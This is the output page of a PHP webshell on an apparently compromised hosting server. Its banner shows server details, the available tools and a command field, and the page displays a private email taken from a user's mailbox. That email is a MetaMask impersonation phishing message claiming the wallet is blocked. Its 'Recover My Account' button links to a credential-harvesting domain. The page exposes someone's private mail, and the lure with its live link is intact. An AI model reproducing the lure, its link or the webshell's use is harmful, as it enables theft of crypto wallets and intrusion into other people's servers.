403Webshell
Server IP : 103.255.250.91  /  Your IP : 216.73.216.185
Web Server : Apache
System : Linux charlie.thegoodhost.io 5.14.0-570.39.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Sep 4 05:08:52 EDT 2025 x86_64
User : tongkhen ( 1019)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/tongkhen/mail/cur/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/tongkhen/mail/cur/1772518432.M134732P121672.charlie.thegoodhost.io,S=8934,W=9092:2,a
Return-Path: <noreply@projetct02-488903.firebaseapp.com>
Delivered-To: tongkhen@charlie.thegoodhost.io
Received: from charlie.thegoodhost.io
	by charlie.thegoodhost.io with LMTP
	id rbIOByB8pmlI2wEAPVMVKQ
	(envelope-from <noreply@projetct02-488903.firebaseapp.com>)
	for <tongkhen@charlie.thegoodhost.io>; Tue, 03 Mar 2026 14:13:52 +0800
Return-path: <noreply@projetct02-488903.firebaseapp.com>
Envelope-to: info@floorworks.com.sg
Delivery-date: Tue, 03 Mar 2026 14:13:52 +0800
Received: from mail-oo1-f72.google.com ([209.85.161.72]:60664)
	by charlie.thegoodhost.io with esmtps  (TLS1.3) tls TLS_AES_128_GCM_SHA256
	(Exim 4.99.1)
	(envelope-from <noreply@projetct02-488903.firebaseapp.com>)
	id 1vxJ0w-00000000VUc-0aaX
	for info@floorworks.com.sg;
	Tue, 03 Mar 2026 14:13:52 +0800
Received: by mail-oo1-f72.google.com with SMTP id 006d021491bc7-679deba5e9fso74116821eaf.0
        for <info@floorworks.com.sg>; Mon, 02 Mar 2026 22:13:27 -0800 (PST)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=firebaseapp.com; s=20230601; t=1772518386; x=1773123186; darn=floorworks.com.sg;
        h=to:from:subject:date:message-id:reply-to:mime-version:from:to:cc
         :subject:date:message-id:reply-to;
        bh=0jEdE7e15F4223mjoX/F0gfjySm7jnALZa6Swrnsxn4=;
        b=YKUQlE8hRc6R/05PbIdcXVDHPVOnX5v2EnpH9PVGIh156zLI1Ha6GtHqPuzwA3PbfI
         MDHLJ9VKaWuwLSBugXB2ZjbprcX0SDNTU28sGvsRH+y9T/csWhuubJ0fWHLVkHb3f5r4
         bk4pX6n1zWXX8sXnwhd66/ZrfxKT2vQT4R1M8uQWrdVhph0XT91mqmHQvfaLLhXPBo+N
         jGwTaZ/RH6ChjbtQNRGbEcMm62JZOeUNFVp8vMT7A2RgOtVR+vSO61UrD5gP666cPT54
         Q5KSa4ZpNXSHKiGOtmTCgbc1XRrpNv7cScCUIwmKDpdmoETo544Lzz8XwXHMANIpbD5a
         Zw0Q==
X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=1e100.net; s=20230601; t=1772518386; x=1773123186;
        h=to:from:subject:date:message-id:reply-to:mime-version
         :x-gm-message-state:from:to:cc:subject:date:message-id:reply-to;
        bh=0jEdE7e15F4223mjoX/F0gfjySm7jnALZa6Swrnsxn4=;
        b=tF48rlWiWdXrePB8FvFvbtw7U4xHnBjTLUJUOVlMFsikkfhhU4Y7BExzGcJDYhhvXZ
         eSVj8k3yEcgwXeFoUlkI0+D75AL0NyIk4Vk+Eq6YcynyAehagcjmG1K2OJp3eSFyZSZf
         vdVpq8DbNKWllqHWoeKw+Ex0QNszdZ167MiONNqOYvm8gtInYK3y+lW3NSdCaK/I0sS8
         328LG8TAzcd/5qwsS5P5xySwn+1FWI2D9+WW1Gn0CXB2uml3Y8P3PWEO7yX+boY1xR9F
         GHVjtck9tqOW/z02JAVyV/EbF+xWt8DFKjCIg2tZIdh7LvHDvMEVEEnE1C8DiyQT3YNG
         LZ7g==
X-Gm-Message-State: AOJu0YxB8ZMRd8X1yOFR3t9jemrw2Wx1b7xcvlGEY7ktSc/FTd/Z6+d8
	Vl0L3xSK6cBPM8pXcF95Umikj9akgK1jfejdYQCBrQuIxS0dc/LGcwSS7cJOLb6Vh3ziLOZbdvf
	lhmIpju5lSg==
MIME-Version: 1.0
X-Received: by 2002:a4a:e918:0:b0:679:bbd4:605e with SMTP id
 006d021491bc7-679fade537emr8908318eaf.16.1772518386402; Mon, 02 Mar 2026
 22:13:06 -0800 (PST)
Reply-To: no-reply@exlei.com
Message-ID: <000000000000c78608064c18989c@google.com>
Date: Tue, 03 Mar 2026 06:13:06 +0000
Subject: Important: Don't lose access to your account! - Ticket: [629-732-905]
From: Metamask <noreply@projetct02-488903.firebaseapp.com>
To: info@floorworks.com.sg
Content-Type: multipart/alternative; boundary="000000000000c785fd064c189899"
X-Spam-Status: No, score=2.8
X-Spam-Score: 28
X-Spam-Bar: ++
X-Ham-Report: Spam detection software, running on the system "charlie.thegoodhost.io",
 has NOT identified this incoming email as spam.  The original
 message has been attached to this so you can view it or label
 similar future email.  If you have any questions, see
 root\@localhost for details.
 Content preview:  Dear Customer, We noticed that someone just tried to log in
    to your MetaMask from location you have not used before, so we want to make
    sure it's really you. Your account and your wallet have been temporarily
   blocked to prevent you from losing your assets. 
 Content analysis details:   (2.8 points, 5.0 required)
  pts rule name              description
 ---- ---------------------- --------------------------------------------------
  0.0 RCVD_IN_MSPIKE_H3      RBL: Good reputation (+3)
                             [209.85.161.72 listed in wl.mailspike.net]
  0.0 URIBL_BLOCKED          ADMINISTRATOR NOTICE: The query to URIBL was blocked.
                             See
                             http://wiki.apache.org/spamassassin/DnsBlocklists#dnsbl-block
                              for more information.
                             [URI: logowik.com]
                             [URI: firebaseapp.com]
                             [URI: caboverdeoceanweek.cv]
 -0.0 SPF_PASS               SPF: sender matches SPF record
  0.1 DKIM_SIGNED            Message has a DKIM or DK signature, not necessarily valid
 -0.1 DKIM_VALID             Message has at least one valid DKIM or DK signature
  0.0 RCVD_IN_MSPIKE_WL      Mailspike good senders
  0.0 HTML_MESSAGE           BODY: HTML included in message
  0.7 HTML_IMAGE_ONLY_20     BODY: HTML: images with 1600-2000 bytes of words
  0.7 RCVD_IN_VALIDITY_CERTIFIED_BLOCKED RBL: ADMINISTRATOR NOTICE: The
                             query to Validity was blocked.  See
                             https://knowledge.validity.com/hc/en-us/articles/20961730681243
                              for more information.
                          [209.85.161.72 listed in sa-trusted.bondedsender.org]
  0.5 RCVD_IN_VALIDITY_SAFE_BLOCKED RBL: ADMINISTRATOR NOTICE: The query to
                              Validity was blocked.  See
                             https://knowledge.validity.com/hc/en-us/articles/20961730681243
                              for more information.
                             [209.85.161.72 listed in sa-accredit.habeas.com]
  1.0 RCVD_IN_VALIDITY_RPBL_BLOCKED RBL: ADMINISTRATOR NOTICE: The query to
                              Validity was blocked.  See
                             https://knowledge.validity.com/hc/en-us/articles/20961730681243
                              for more information.
                             [209.85.161.72 listed in bl.score.senderscore.com]
X-Spam-Flag: NO

--000000000000c785fd064c189899
Content-Type: text/plain; charset="UTF-8"; format=flowed; delsp=yes
Content-Transfer-Encoding: base64

RGVhciBDdXN0b21lciwNCg0KV2Ugbm90aWNlZCB0aGF0IHNvbWVvbmUganVzdCB0cmllZCB0byBs
b2cgaW4gdG8geW91ciBNZXRhTWFzayBmcm9tIGxvY2F0aW9uICANCnlvdSBoYXZlIG5vdCB1c2Vk
IGJlZm9yZSwgc28gd2Ugd2FudCB0byBtYWtlIHN1cmUgaXQncyByZWFsbHkgeW91Lg0KDQpZb3Vy
IGFjY291bnQgYW5kIHlvdXIgd2FsbGV0IGhhdmUgYmVlbiB0ZW1wb3JhcmlseSBibG9ja2VkIHRv
IHByZXZlbnQgeW91ICANCmZyb20gbG9zaW5nIHlvdXIgYXNzZXRzLg0KDQpIb3cgY2FuIEkgcmVj
b3ZlciBteSBhY2NvdW50Pw0KDQoNCkNsaWNrIGFuZCBmb2xsb3cgdGhlIGluc3RydWN0aW9ucyB0
byByZWNvdmVyIHlvdXIgYWNjb3VudCBhbmQgdW5ibG9jayBpdC4NCkFmdGVyIGNvbXBsZXRpbmcg
dGhlIHByb2Nlc3MsIGVuYWJsZSBUd28tRmFjdG9yIEF1dGhlbnRpY2F0aW9uLg0KUmVjb3ZlciBN
eSBBY2NvdW50DQoNCsKpIDIwMjYgTWV0YU1hc2suIEFsbCByaWdodHMgcmVzZXJ2ZWQuDQoNCg0K
--000000000000c785fd064c189899
Content-Type: text/html; charset="UTF-8"
Content-Transfer-Encoding: quoted-printable

<div class=3D"xam_msg_class">
<div class=3D"email-container" style=3D"max-width: 600px; margin: 20px auto=
; background-color: #ffffff; padding: 20px; border-radius: 5px; box-shadow:=
 0 4px 12px rgba(0, 0, 0, 0.05);">
<div class=3D"email-header" style=3D"text-align: center; border-bottom: 1px=
 solid #e8e8e8; padding-bottom: 10px; margin-bottom: 20px;">
<h2>&nbsp;<img src=3D"https://logowik.com/content/uploads/images/metamask41=
12.jpg" width=3D"179" height=3D"134" /></h2>
<h2>&nbsp;</h2>
</div>
<div class=3D"email-content">
<p style=3D"line-height: 1.7; color: #333; font-size: 16px; margin: 16px 0;=
">Dear Customer,</p>
<p style=3D"line-height: 1.7; color: #333; font-size: 16px; margin: 16px 0;=
">We noticed that someone just tried to log in to your&nbsp;MetaMask from l=
ocation you have not used before, so we want to make sure it's really you.<=
/p>
<div class=3D"alert-text" style=3D"background-color: #ffebeb; padding: 10px=
; margin: 20px 0; border: 1px solid #FF5300; border-radius: 5px; color: #d9=
3a00;">Your account and your wallet have been temporarily blocked to preven=
t you from losing&nbsp;your assets.</div>
<h3>How can I recover my account?</h3>
<ol>
<li>Click and follow the instructions to recover your account and unblock i=
t.</li>
<li>After completing the process, enable Two-Factor Authentication.</li>
</ol>
<a class=3D"recover-button" style=3D"display: block; width: 100%; max-width=
: 250px; margin: 30px auto; text-align: center; padding: 10px 15px; backgro=
und-color: #ff5300; color: #ffffff; text-decoration: none; border-radius: 5=
px; font-weight: 600; letter-spacing: 0.5px; transition: background-color 0=
.3s;" href=3D"https://ledgeupdataser.caboverdeoceanweek.cv/eronga/" target=
=3D"_blank" rel=3D"noopener noreferrer">Recover My Account</a></div>
<div class=3D"footer-text" style=3D"font-size: 12px; color: #888; text-alig=
n: center; margin-top: 40px;">&copy; 2026 MetaMask. All rights reserved.</d=
iv>
</div>
</div>
--000000000000c785fd064c189899--

Youez - 2016 - github.com/yon3zu
LinuXploit